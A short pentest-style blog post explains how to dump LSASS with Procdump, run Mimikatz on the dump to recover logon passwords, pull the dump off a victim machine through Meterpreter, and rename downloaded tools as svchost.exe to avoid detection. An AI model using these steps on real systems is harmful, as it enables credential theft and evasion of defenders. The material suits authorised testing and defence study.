Mimikatz Part I: Procdump on LSASS
This post is about extracting passwords in stealth mode: by running Mimikatz offline against a Procdump of LSASS, we can bypass the security controls of most organizations, which are obviously aware of Mimikatz and looking for any instance of it during a pentest.
Here are the steps involved:
- Move Procdump.exe to the victim VM
- Procdump lsass.exe
- Move mimikatz to the victim VM
- Run Mimikatz against lsassdump.dmp: sekurlsa::minidump lsassdump.dmp, then sekurlsa::logonPasswords
Let’s get started.
Run procdump on lsass
Move mimikatz to victim VM
Send from Linux/Windows and receive from Linux/Windows
Here you can see the output of Mimikatz on our LSASS dump. The password is there; I'm not including it!
It’s as simple as that.
Scenario II: Downloading .dmp file remotely using Meterpreter
The objective here is to get the Procdump file from the victim Windows XP machine using the command download c:\\bin\\lsassdump.dmp
Note that double backslashes are needed in the file path.
This assumes that Sysinternals Procdump is already installed on the victim XP machine; it is in my case. As an alternative, one could upload Procdump to the victim by downloading it locally on the XP box with something like wget procdumpdownloadurl > svchost.exe to be sneaky.